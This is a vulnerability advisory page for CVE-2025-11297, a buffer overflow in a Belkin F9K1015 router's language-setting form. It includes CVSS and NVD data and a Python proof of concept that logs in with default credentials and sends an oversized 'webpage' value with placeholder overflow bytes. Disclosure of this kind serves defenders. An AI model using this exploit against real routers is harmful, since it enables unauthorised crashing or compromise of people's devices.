CVE-2025-11297

Description

A vulnerability was found in Belkin F9K1015 1.00.10. This issue affects some unknown processing of the file /goform/formSetLanguage. Performing a manipulation of the argument webpage results in buffer overflow. The attack is possible to be carried out remotely. The exploit has been made public and could be used. The vendor was contacted early about this disclosure but did not respond in any way.

CVSS Details

CVSS Score

8.8

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:o:belkin:f9k1015_firmware:1.00.10:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:h:belkin:f9k1015:-:*:*:*:*:*:*:* - NOT VULNERABLE

Belkin F9K1015 1.00.10

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2025-11297 PoC - Belkin F9K1015 formSetLanguage Buffer Overflow
# Author: panda666-888
# Description: Buffer overflow via 'webpage' parameter in /goform/formSetLanguage

import requests
import sys

TARGET = "http://192.168.1.1"  # Default Belkin router address
LOGIN_URL = f"{TARGET}/login.cgi"
EXPLOIT_URL = f"{TARGET}/goform/formSetLanguage"

# Step 1: Authenticate (low privilege credentials required)
USERNAME = "admin"
PASSWORD = "password"  # Default or known low-privilege credentials

session = requests.Session()
login_data = {
    "pws": PASSWORD,
    "submit": "Login"
}
session.post(LOGIN_URL, data=login_data)

# Step 2: Craft malicious payload
# Buffer overflow payload - adjust offset based on target
OFFSET = 512  # Approximate offset to return address
RET_ADDR = b"\x41\x41\x41\x41"  # Placeholder return address

# NOP sled + shellcode (example pattern)
payload = b"A" * OFFSET + RET_ADDR + b"\x90" * 32 + b"\xcc" * 100

# Step 3: Send exploit
exploit_params = {
    "webpage": payload.decode('latin-1'),
    "submit": "Apply"
}

print(f"[*] Sending exploit to {EXPLOIT_URL}")
try:
    response = session.post(EXPLOIT_URL, data=exploit_params, timeout=10)
    print(f"[*] Response status: {response.status_code}")
    if response.status_code == 500 or response.status_code == 502:
        print("[+] Target may be vulnerable - server crashed")
    else:
        print("[*] Response received")
except requests.exceptions.RequestException as e:
    print(f"[+] Connection failed - target may have crashed: {e}")
    print("[+] Exploit likely successful")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-11297
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-11297
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-11297/
[4] VulDB https://vuldb.com/cve/CVE-2025-11297
[5] https://github.com/panda666-888/vuls/blob/main/belkin/f9k1015/formSetLanguage.md
[6] https://github.com/panda666-888/vuls/blob/main/belkin/f9k1015/formSetLanguage.md#poc
[7] https://vuldb.com/?ctiid.327178
[8] https://vuldb.com/?id.327178
[9] https://vuldb.com/?submit.661301
[10] https://github.com/panda666-888/vuls/blob/main/belkin/f9k1015/formSetLanguage.md
[11] https://github.com/panda666-888/vuls/blob/main/belkin/f9k1015/formSetLanguage.md#poc

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-11297", "sourceIdentifier": "[email protected]", "published": "2025-10-05T18:15:32.140", "lastModified": "2026-02-24T07:16:24.167", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability was found in Belkin F9K1015 1.00.10. This issue affects some unknown processing of the file /goform/formSetLanguage. Performing a manipulation of the argument webpage results in buffer overflow. The attack is possible to be carried out remotely. The exploit has been made public and could be used. The vendor was contacted early about this disclosure but did not respond in any way."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 7.4, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "baseScore": 9.0, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "availabilityImpact": "COMPLETE"}, "baseSeverity": "HIGH", "exploitabilityScore": 8.0, "impactScore": 10.0, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-119"}, {"lang": "en", "value": "CWE-120"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:belkin:f9k1015_firmware:1.00.10:*:*:*:*:*:*:*", "matchCriteriaId": "3DEB0AFD-4E01-4FD5-8A41-6BD0E2D4DF0B"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:belkin:f9k1015:-:*:*:*:*:*:*:*", "matchCriteriaId": "0D273CA6-07A9-43B2-87B3-D0DE1A5B89FA"}]}]}], "references": [{"url": "https://github.com/panda666-888/vuls/blob/main/belkin/f9k1015/formSetLanguage.md", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://github.com/panda666-888/vuls/blob/main/belkin/f9k1015/formSetLanguage.md#poc", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://vuldb.com/?ctiid.327178", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.327178", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.661301", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://github.com/panda666-888/vuls/blob/main/belkin/f9k1015/formSetLanguage.md", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://github.com/panda666-888/vuls/blob/main/belkin/f9k1015/formSetLanguage.md#poc", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Third Party Advisory"]}]}}